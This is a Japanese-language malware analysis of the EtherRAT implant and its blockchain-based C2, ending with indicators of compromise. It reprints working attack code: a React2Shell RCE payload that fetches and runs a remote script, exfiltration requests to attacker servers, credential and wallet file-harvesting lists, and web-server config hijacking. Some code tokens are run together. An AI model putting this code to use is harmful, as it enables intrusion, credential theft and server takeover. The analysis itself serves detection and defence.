EtherRAT解剖:React2ShellインプラントがブロックチェーンC2を通じて5つのペイロードを配信する仕組み

コントラクトデプロイメントタイムライン例

コントラクトは2025年12月5日19:13:47 UTCにデプロイされ、CISAがCVE-2025-55182を既知の悪用された脆弱性カタログに追加してから約5時間後でした。攻撃者のウォレットはデプロイメントのわずか3分前に資金を受け取り、最初のC2 URLはコントラクトが稼働してから6分後に設定されました。この緊密なシーケンスは、攻撃者がエクスプロイトを準備済みで、迅速に運用化したことを示唆しています。

プライマリC2コントラクト詳細

ルックアップキーは攻撃者自身のデプロイヤーウォレットアドレスです。この設計パターンは、コントラクトのデータ取得を既知のアドレスに結び付けますが、攻撃者のウォレットがすべてのデプロイされたインプラントに埋め込まれることも意味します。

C2 URL変更履歴

コントラクトは3日間で9つの状態変更を記録しました:

12月6日の91.215.85.42:3000と173.249.8.102の切り替えは、攻撃者が少なくとも2つのC2サーバーを使用していることを示しています。エントリ2と3の間の1分間のギャップ(末尾のスラッシュを削除)は、手動構成修正を示唆しています。

Grabifyを介した被害者列挙

攻撃者のC2インフラストラクチャから最も明らかな詳細は、12月8日にGrabifyリンクを一時的に挿入したことです。Grabifyは訪問者のIP、ユーザーエージェント、地理位置情報をログに記録します。

攻撃者はC2リゾルバを約11分間https://grabify.link/SEFKGUを返すように設定しました。C2をポーリングする感染マシンはGrabifyに接続し、攻撃者のダッシュボードにログを記録します。このウィンドウの後、彼らはプライマリC2に戻り、アクティブな感染を列挙することと一致しています。

OPSECトレードオフ

ブロックチェーンC2は回復力を提供しますが、フォレンジック露出を作成します:

• 単一ウォレット露出:9つの更新すべてがウォレット0xe941a9b2…から発信され、EtherRATと永久に関連付けられます。
• 不変監査証跡:Grabifyリンクを含むすべてのC2 URLが永久に記録されます。従来のC2は消去できますが、ブロックチェーンはできません。
• 資金調達チェーンの可視性:ウォレットはデプロイメントの3分前に0x14afddd6…から資金提供されました。
• サードパーティサービスの使用:Grabifyは攻撃者のIPを含む可能性のあるログを維持します。

CIS諸国除外

最も重要な発見は、特定の言語に設定されたシステムでマルウェアを自己破壊させるロケールチェックです:

const _chkLocale = () => {
const banned = ['ru','be','kk','ky','tg','uz','hy','az','ga'];
// ... 禁止リストに対してシステムロケールをチェック};
if (_chkLocale()) {
    _selfDestruct();
return;
}

禁止されたロケールは独立国家共同体(CIS)諸国に対応します:

この「CIS除外」パターンは、ロシアおよび東ヨーロッパのサイバー犯罪報告でよく文書化されています。これらの地域のアクターは、地元の法的影響を避けるためにCIS諸国を除外します。

EtherRATの戦術、技術、手順(TTP)の大部分は朝鮮民主主義人民共和国(DPRK)に関連する脅威アクターと一致していますが、CIS諸国除外の存在はDPRK帰属と矛盾します。北朝鮮のアクターは通常CIS除外を実装しません。これは、攻撃者が次のいずれかであることを示唆しています:

• 除外を追加し、難読化を追加するためにDPRKから報告された共有ツールを使用しているCISベースのアクター。
• 除外を含むロシアのツールからコードの一部をコピーしたDPRKまたはそれ以外の非CISベースのアクター。
• 調査員を誤解させるための偽旗を使用している。

システム情報収集

ペイロードは被害者プロファイリングのために広範なホストデータを収集します:

ドメインメンバーシップチェックは、マルチプラットフォーム攻撃スクリプトにおいて特に注目に値します。ホストがActive Directoryドメインの一部であるかどうか、および現在のユーザーが管理者権限を持っているかどうかを判断します:

const getDomainInfo = () => {
let domain = 'WORKGROUP', inDomain = false, isAdmin = false;
// Windows: Win32_ComputerSystem.PartOfDomainをチェック// Linux: hostname -d / dnsdomain nameをチェック// また、'net session'(Windows)またはUID 0(Linux)経由で管理者をチェックreturn { domain, inDomain, isAdmin };
};

このプロファイリングデータにより、オペレーターはさらなる悪用のために高価値ターゲット(管理者アクセス権を持つドメイン参加企業システム)を特定できます。

GPU列挙も重要です。複数の方法(lspci、glxinfo、WMIクエリ)にわたる詳細なGPU検出は、オペレーターがクリプトマイニングの可能性についてシステムを評価していることを示唆しており、これは他の攻撃者による初期React2Shellエクスプロイトで見られた日和見的クリプトマイニングと一致します。

アンチウイルス検出

ペイロードは両方の環境で動作するために、WindowsとLinuxの両方でセキュリティ製品をチェックします:

// Windows: SecurityCenter2 WMI名前空間にクエリ// Linux: 既知のAVプロセスのプロセスリストを検索const avProcesses = ['clamd', 'freshclam', 'sophos', 'avast', 'eset', 'kaspersky', 'comodo'];

C2流出

収集されたデータは、積極的な再試行ロジック(指数バックオフで最大100回の試行)を使用してHTTP POST経由で流出されます:

const serverUrl = "http://91.215.85.42:3000";
const hwid = getHWID();
const postUrl = `${serverUrl}/${hwid}`;

await sendWithRetry(postUrl, info);

BIP39シードフレーズ検出

ペイロードは、暗号通貨ウォレットのシードフレーズを生成するために使用されるすべての2,048ワードで構成される完全なBIP39ワードリストを埋め込みます:

const BIP39_WORDS = [
"abandon", "ability", "able", "about", "above", "absent", "absorb", "abstract",
// ... 追加の2,040ワード"zero", "zone", "zoo"];
const BIP39_SET = newSet(BIP39_WORDS);

ハーベスターは2つの検出方法を使用します。まず、mnemonic、seed、recovery、walletなどの用語の近くでBIP39ワードを検索します。次に、スライディングウィンドウスキャンを実行し、12〜24の連続したワードのすべてのシーケンスをBIP39セットに対してチェックします:

for (const len of [24, 21, 18, 15, 12]) {
if (words.length >= len) {
const slice = words.slice(0, len);
if (slice.every(w => BIP39_SET.has(w))) {
            addFinding('seed_phrase', filePath, slice.join(' '));
break;
        }
    }
}

この2部構成のアプローチは、回復されたシードの価値を最大化するために、24ワードフレーズ(256ビットのエントロピー)を短いバリアントよりも優先します。

ファイルベースのBIP39スキャンは新興技術です。SANS ISCは2024年11月にこのアプローチを使用するPythonインフォスティーラーを文書化しましたが、EtherRATの実装はより洗練されています:

埋め込みワードリスト、スライディングウィンドウスキャン、楕円曲線検証は、典型的なスティーラーを超える暗号通貨の専門知識を示しています。

ターゲット秘密パターン

認証情報ハーベスターには、カテゴリ別に整理された50以上の正規表現パターンが含まれています:

Ethereum秘密鍵検証は、単に64文字の16進文字列を照合するだけでなく、secp256k1曲線次数に対して検証します:

const isValidPrivateKey = (hex) => {
if (!/^[a-fA-F0-9]{64}$/.test(hex)) returnfalse;
const bn = BigInt('0x' + hex);
const max = BigInt('0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364140');
return bn > 0n && bn < max;
};

これにより、ランダムな16進文字列からの偽陽性が排除され、暗号通貨の内部に精通していることが示されます。

ウォレットディレクトリハーベスティング

ペイロードは、暗号通貨ウォレットストレージの場所を特にターゲットにします:

Windows:

• %APPDATA%\Ethereum, %APPDATA%\Bitcoin、%APPDATA%\Exodus、%APPDATA%\atomic
• %LOCALAPPDATA%\Coinbase、%APPDATA%\Electrum
• Chrome/Brave拡張機能ストレージ(MetaMask、Phantomなど)

Linux:

• ~/.ethereum、~/.bitcoin、~/.exodus、~/.atomic、~/.electrum
• ~/.config/google-chrome/Default/Local Extension Settings
• ~/.config/BraveSoftware/Brave-Browser/Default/Local Extension Settings

ブラウザ拡張機能ストレージは、MetaMaskのようなブラウザベースのウォレットが暗号化されたボールトデータを保存する場所であるため、特に価値があります。暗号化されたボールトと弱いパスワードがあれば、攻撃者はウォレット鍵へのアクセスをブルートフォースできます。

クラウドおよびインフラストラクチャ認証情報盗難

暗号通貨を超えて、ハーベスターはクラウドプロバイダーとインフラストラクチャの認証情報をターゲットにします:

AWS:

• ~/.aws/credentials、~/.aws/config
• アクセスキー(AKIA)、秘密鍵、セッショントークン

Google Cloud:

• ~/.config/gcloud/credentials.db、application_default_credentials.json
• サービスアカウントJSONファイル

Azure:

• ~/.azure/accessTokens.json、azureProfile.json

Kubernetes:

• ~/.kube/config、/etc/kubernetes/admin.conf

その他:

• Docker設定、Git認証情報、Terraform状態ファイル
• SSH秘密鍵(id_rsa、id_ed25519、id_ecdsa)
• HashiCorp Vaultトークン、npm/pip認証情報

興味深いファイルとスキャン戦略

ペイロードは50以上の高価値ファイル名のリストを維持します:

const INTERESTING_FILES = [
'.env', '.env.local', '.env.production', '.env.development', '.env.staging',
'wallet.json', 'keystore.json', 'wallet.dat', 'key.json',
'id_rsa', 'id_ed25519', 'id_ecdsa', 'id_dsa',
'.npmrc', '.pypirc', '.netrc', '.htpasswd',
'docker-compose.yml', '.git-credentials',
'terraform.tfvars', '*.tfstate',
'service-account.json', 'firebase-adminsdk.json',
// ... 追加ファイル];

スキャンは、検索ディレクトリ(ホームディレクトリ、Linuxでは/var/www、/opt、/srv, /etc 、WindowsではC:\Users, C:\inetpub\wwwroot、XAMPP/WAMPルート)を最大10レベルまで再帰的に歩き、興味深い名前または拡張子(.env、.json、.yml、.key、.pemなど)に一致するファイルを調べます。

この徹底的なペイロードスキャナーは、攻撃者の目的が日和見的クリプトマイニングや基本的な認証情報ハーベスティングを超えていることを示しています。認証情報、APIキー、証明書、その他の機密データを含む可能性のあるファイルが確実に識別され、見落とされることはありません。

コードには、自身のペイロードと思われるファイルをスキップし、難読化されたコンテンツを回避する検出防止ロジックも含まれています:

// ペイロード/ボットファイルをスキップconst fileName = path.basename(filePath).toLowerCase();
if (/^\.?[a-z0-9]{6,12}\.js$/.test(fileName)) return;
if (fileName.includes('payload') || fileName.includes('loader')) return;

シェル履歴マイニング

ハーベスターはシェル履歴ファイルを読み取り、コマンドライン履歴から認証情報を抽出します:

const histFiles = isWin ? [
'AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt',
] : [
'~/.bash_history', '~/.zsh_history',
'/root/.bash_history', '/root/.zsh_history',
];

開発者は頻繁にコマンドライン引数または環境変数として認証情報を渡すため、シェル履歴は漏洩した秘密の信頼できるソースになります。

流出

侵害されたシステムの広範な検索から収集されると、収集された認証情報は専用エンドポイント経由で同じC2サーバーに流出されます:

const serverUrl = "http://91.215.85.42:3000";

await fetch(`${serverUrl}/crypto/keys`, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
botHwid: getHWID(),
ip: await getPublicIP(),
hostname: os.hostname(),
        findings  // 発見されたすべての秘密の配列    })
});

/crypto/keys エンドポイント名と広範な暗号通貨重視の収集能力は、金銭的盗難が主な目的であることを確認します。

スキャンインフラストラクチャ

ワームはランダムIPアドレスを生成し、一般的なウェブポートをプローブします:

const PORTS = [80, 443, 3000, 3001, 8080, 8443];
const CONCURRENCY = 500;
const TIMEOUT = 3000;

500の同時接続と3秒のタイムアウトで、単一の感染ホストは分あたり約10,000のIP:ポートの組み合わせをスキャンできます。スキャナーは自己検出を避けるために自身のIPアドレスを除外しますが、注目すべきことに、侵害されたネットワーク内での横方向の移動を可能にするプライベートネットワーク範囲(10.x.x.x、172.16-31.x.x、192.168.x.x)を含みます。

Next.jsフィンガープリンティング

エクスプロイトを試みる前に、ワームは複数の検出方法を通じてNext.jsサーバーを識別します:

const isNext = async (ip, port) => {
const res = await req(ip, port);
if (!res) returnfalse;
const h = res.headers, b = res.body || '';
return h['x-powered-by']?.includes('Next.js') || 
           h['x-nextjs-page'] || 
           b.includes('/_next/') || 
           b.includes('__NEXT_DATA__');
};

フィンガープリンティングは、X-Powered-By: Next.jsヘッダー、X-NextJS-Pageヘッダー、およびレスポンスボディ内のNext.jsアーティファクト(/_next/静的パスまたは__NEXT_DATA__ ハイドレーションスクリプト)をチェックします。このマルチメソッドアプローチは、サーバーが部分的なヘッダー抑制を持っている場合でも検出を最大化します。

CVE-2025-55182エクスプロイト

rce関数には、動作するReact2Shellエクスプロイトが含まれています。このペイロード構造が実際のマルウェアで公に文書化されたのはこれが初めてです:

const rce = async (ip, port) => {
const cmd = `(curl -s ${SHELL_URL} -o /tmp/s.sh||wget -q -O /tmp/s.sh ${SHELL_URL})&&chmod +x /tmp/s.sh&&/tmp/s.sh &`;
const b64 = Buffer.from(cmd).toString('base64');
const code = `var cp=process.mainModule.require("child_process");try{cp.exec("echo ${b64}|base64 -d|sh")}catch{}"ok"`;
    
const chunk = JSON.stringify({
then: '$1:__proto__:then',
status: 'resolved_model',
value: '{"then":"$B1337"}',
reason: -1,
_response: {
_prefix: code + '//',
_chunks: '$Q2',
_formData: { get: '$1:constructor:constructor' }
        }
    });
// マルチパートフォーム構築...const res = await req(ip, port, {
method: 'POST',
headers: {
'Content-Type': `multipart/form-data; boundary=${bd}`,
'Next-Action': 'a'.repeat(40)
        },
        body
    });
};

エクスプロイトは、React Server Componentsのストリーミングプロトコルと組み合わせたプロトタイプ汚染($1:__proto__:then)を使用してリモートコード実行を達成します。主な要素には、Next-Actionヘッダー(40文字、Server Action処理をトリガー)、レスポンスオブジェクトプロトタイプを汚染する不正なマルチパートペイロード、およびFunctionコンストラクタに到達するためのコンストラクタチェーンアクセス($1:constructor:constructor)が含まれます。_response._prefix フィールドには実際のペイロード、シェルコマンドを実行するためにchild_process.exec()を使用するNode.jsコードが含まれています。

セカンダリC2インフラストラクチャ

ワームは2番目のC2サーバーを明らかにします:

const SHELL_URL = 'http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh';

2番目のサーバーは、新しく侵害されたホストにデプロイされたシェルスクリプトをホストします。潜在的に難読化されたファイル名(gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh)は、自動検出に対する最小限の保護を提供します。

ワームターゲティング

モジュールは無期限に実行され、継続的にターゲットを生成します:

while (true) {
const ips = Array.from({ length: 10 }, randIP);
for (const ip of ips) {
for (const port of PORTS) {
// スキャンと悪用...        }
    }
}

成功した侵害はローカルにログに記録されます:

const logFile = path.join(os.tmpdir(), 'nextjs_scan.log');
// [FOUND] 192.168.1.50:3000  - Next.js検出// [SHELL] 192.168.1.50:3000  - エクスプロイト成功

このログファイルは、その後のC2タスキングによって流出される可能性があり、攻撃者にワームの伝播成功率の可視性を提供します。

横方向の移動への影響

プライベートIP範囲をスキップする典型的なインターネットワームとは異なり、EtherRATワームは明示的にそれらを含みます:

const randIP = () => {
const a = Math.random() * 256 | 0;
if (a === 0 || a >= 224) return randIP();  // 0.x.x.xとマルチキャストをスキップ// プライベート範囲(10.x、172.16-31.x、192.168.x)は除外されませんconst ip = `${a}.${...}`;
if (ownIPs.has(ip)) return randIP();  // 自身のIPのみスキップreturn ip;
};

これは、企業環境での単一の侵害が、内部のNext.js開発サーバー、CI/CDパイプライン、ステージング環境に伝播する可能性があり、最初に侵害されたホストを超えて攻撃面を大幅に拡大することを意味します。

ターゲットドメイン

const TARGET_DOMAIN = 'xss.pro';
const TARGET_URL = `https://${TARGET_DOMAIN}`;
const WEBHOOK_URL = 'https://webhook.site/63575795-ee27-4b29-a15d-e977e7dc8361';

XSS.proは、最大のロシア語サイバー犯罪マーケットプレイスの1つであるXSSフォーラムの代替クリアウェブドメインです。フォーラムの元のドメイン(xss.is)は2025年7月にEuropolによって押収され、その管理者「Toha」は広告掲載とサービス料金から700万ユーロ以上を稼いだとされ、キエフで逮捕されました。xss.proドメインは2025年8月に新しい未検証の管理下で出現しました。

フォーラムの現在の状態は不確実です。元のモデレーターはプラットフォームを放棄し、競合するフォーラム(DamageLib)を立ち上げ、xss.proはおそらく法執行機関のハニーポットであると警告しました。ユーザーアクティビティは崩壊したと報告されており、評判の高いほとんどの脅威アクターは他の場所に移行しました。アクティブな2025年12月のペイロードにこのリダイレクトターゲットが存在することは、攻撃者が7月の押収前からツールを更新していないか、現在ドメインを管理している誰とでもアフィリエイト関係を維持していることを示唆しています。

フォーラムの現在の状態に関係なく、意図された収益化モデルは明確です:フォーラムの歴史的な広告ベースの収益構造は、訪問者を駆り立てることが広告契約を持つアクターの収入を生み出すことを意味しました。これは、侵害されたインフラストラクチャに対する低労力の収益化パスを表しています。別のマルウェア配信やフィッシングページを維持するのではなく、攻撃者は単にすべてのトラフィックを既存のプラットフォームにリダイレクトし、そこでボリュームが収益に変換されます。

リダイレクトメカニズム自体は著しく洗練されていません。ペイロードはHTTP 301永久リダイレクトを使用します。つまり、訪問者はブラウザのアドレスバーでURL変更を見ることができます:例えば、legitimate-site.comと入力すると、目に見えてxss.proに着陸します。これは、宛先を隠す透明なプロキシや隠しiframeではありません。ユーザーは、特にxss.proがログインページ、エラー、または押収バナーを表示する場合、すぐに何かが間違っていることに気付くでしょう。この率直なアプローチは、ペイロードがステルスよりもボリュームを優先することを示唆しており、ターゲットを絞った攻撃というよりはサービス妨害または粗雑なトラフィック生成として機能します。被害者のユーザーがリダイレクトされるサービス拒否攻撃の可能性もあります。

EtherRATのウェブサーバーハイジャッカーペイロードは、その前任者よりも粗雑なアプローチ(モジュールインジェクションではなく設定置換)を表していますが、アクティブな2025年キャンペーンでの存在は、フォーラムトラフィック収益化のためにこの技術が再び使用されていることを示唆しています。

Nginx設定ハイジャック

ペイロードはnginx設定ディレクトリを体系的に処理します:

const dirs = [
'/etc/nginx/sites-enabled',
'/etc/nginx/conf.d',
'/etc/nginx/sites-available'];

各設定ファイルについて、既存のSSL証明書とサーバー名を抽出し、設定全体をリダイレクトに置き換えます:

let newConf = `# ${TARGET_URL}にリダイレクト\n`;

if (has443) {
const sslCert = ssl?.cert || '/etc/ssl/certs/ssl-cert-snakeoil.pem';
const sslKey = ssl?.key || '/etc/ssl/private/ssl-cert-snakeoil.key';
    
    newConf += `server {
    listen 443 ssl;
    listen [::]:443 ssl;
    server_name ${serverName};
    ssl_certificate ${sslCert};
    ssl_certificate_key ${sslKey};
    return 301 ${TARGET_URL}$request_uri;
}\n`;
}

ペイロードは既存のSSL証明書を保持してHTTPS機能を維持するため、訪問者はリダイレクトされる前に元のドメインの有効な証明書を確認します。元の設定は、変更前に.bak拡張子でバックアップされます。

Apacheハイジャック

Apache設定も同様の処理を受け、既存の仮想ホストが無効化され、ユニバーサルリダイレクトに置き換えられます:

const redirect = `<VirtualHost *:80>
    ServerName _default_
    Redirect 301 / ${TARGET_URL}/
</VirtualHost>
<VirtualHost *:443>
    ServerName _default_
    SSLEngine on
    SSLCertificateFile /etc/ssl/certs/ssl-cert-snakeoil.pem
    SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key
    Redirect 301 / ${TARGET_URL}/
</VirtualHost>`;

fs.writeFileSync(path.join(dir, '000-redirect.conf'), redirect);

000-プレフィックスは、リダイレクト設定が最初に読み込まれることを保証し、残りの設定よりも優先されます。

権限昇格の試み

ペイロードがroot権限なしで実行される場合、昇格された権限でハイジャックロジックを再実行しようとします:

const cmds = [
`sudo node -e "${elevateScript.replace(/"/g, '\\"').replace(/\n/g, '')}"`,
`sudo su -c 'node -e "${elevateScript...}"'`];

node -eフラグは、コマンドライン引数として直接渡されたJavaScriptを実行し、別のスクリプトファイルをディスクに書き込む必要を回避します。これをsudoでラップすることにより、ペイロードはnginx変更コードをrootとして実行しようとします。このアプローチは、一時スクリプトを削除して実行するよりもファイルシステムアーティファクトを少なく残します。

偵察流出

変更の前後に、ペイロードは「webhook.site」エンドポイントに広範なシステム情報を報告します:

const report = {
hostname: os.hostname(),
ip: run('curl -s ifconfig.me'),
user: os.userInfo().username,
uid: process.getuid ? process.getuid() : -1,
platform: os.platform(),
target: TARGET_URL,
    logs,
nginxTest: run('nginx -t 2>&1'),
apacheTest: run('apachectl -t 2>&1'),
services: run('ps aux | grep -E "nginx|apache|httpd|caddy"'),
configs: run('ls -la /etc/nginx/sites-enabled/ /etc/nginx/conf.d/'),
timestamp: newDate().toISOString()
};

流出に「webhook.site」(正規のデバッグサービス)を使用することは、攻撃者が管理するインフラストラクチャを必要としない使い捨ての匿名エンドポイントを提供するため、注目に値します。

Ethereumインフラストラクチャ

C2サーバー

URL

http://91.215.85.42:3000/{hwid}                              # 偵察流出http://91.215.85.42:3000/crypto/keys                         # 認証情報流出http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh     # ワームシェルスクリプトhttps://grabify.link/SEFKGU                                  # IPロガー(短時間使用)https://webhook.site/63575795-ee27-4b29-a15d-e977e7dc8361    # ウェブハイジャッカー流出

ウェブハイジャッカーターゲット

xss.pro

SSHバックドア鍵

フィンガープリント: SHA256:1RquAvdtW48Ken6IVUZi/o4liu1SXlvezhgjb2fnvBg
コメント: root@vps

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFTxaWmhQkYYF2LgNsAumFqxUiUSv8YEd7DRE9Wb076YxY0fGn4scWzmQnIP/xsrynapcrGKhBXW31BG7wFearY9fctJeHrnAw7CeXqMybFPGIrl+PbLsUnH2AeizjqTOhVZMrgO+0MdsNrdGTN58azTRIvDvgXX9/4p5tinRvisP8jQXPwRv9gurT9hbjrff8bFYmbttSkFXzwlvo5jVi3WrDBLeSSaEnolsJbvCGzzNtm2s77O3yesztMOn03YR1b1QWaOZMTQtzS7gvpKQ8voxypyUd2H+qwK1fe3S7t3QHnNBoKxHXi/KsxgFbY9G74SKV15jTFyrJCJOaYQbVSZiz+uPYDRgW4xBKDsKEx5ne2E4oqJVSSNiZ/QJs0+zA3QFIflcR3WrZ6xxw0ivk/nvhzcCsd+K94jK/qheJzrTTvWqjo8FauCN8LtxqQGpbNWHHRJqc2m/lTt8CA2V89RquqMX7FhArF86TnMxHHt9IDDCf07eIEbpLuWGpJLBJeHbqy5h8yB8ZoUj/E3E7+KMd6HGvYkKxn3YItfopArpg6AfWzP0bjyw7yzxdsbElkxL3K6UcBeTBXb/HMOpTE9uyNN4TvczJZAbB6Yy51x2RU4Yd815MFVPVFFn+5/z+ZyK9442c9/UHKMcbOtXkvydWM7v01xCc8tFlIFKa4w== root@vps

ファイルシステムアーティファクト

ネットワークシグネチャ

ワームスキャン:

• ポート80、443、3000、3001、8080、8443への大量接続
• プライベートIP範囲を含む(10.x、172.16-31.x、192.168.x)

React2Shellエクスプロイト:

• Next-Actionヘッダー(40のランダムな英数字)を含むHTTPリクエスト
• $1:__proto__:thenを含むPOSTボディ(プロトタイプ汚染シグネチャ)

偵察流出:

• hwidがハードウェア識別子のパターンに一致する/{hwid}エンドポイントへのPOSTリクエスト

CIS諸国除外

偵察ペイロードは、システムロケールが次と一致する場合、自己終了します:

ru, be, kk, ky, tg, uz, hy, az, ka
(ロシア、ベラルーシ、カザフスタン、キルギスタン、タジキスタン、ウズベキスタン、アルメニア、アゼルバイジャン、ジョージア)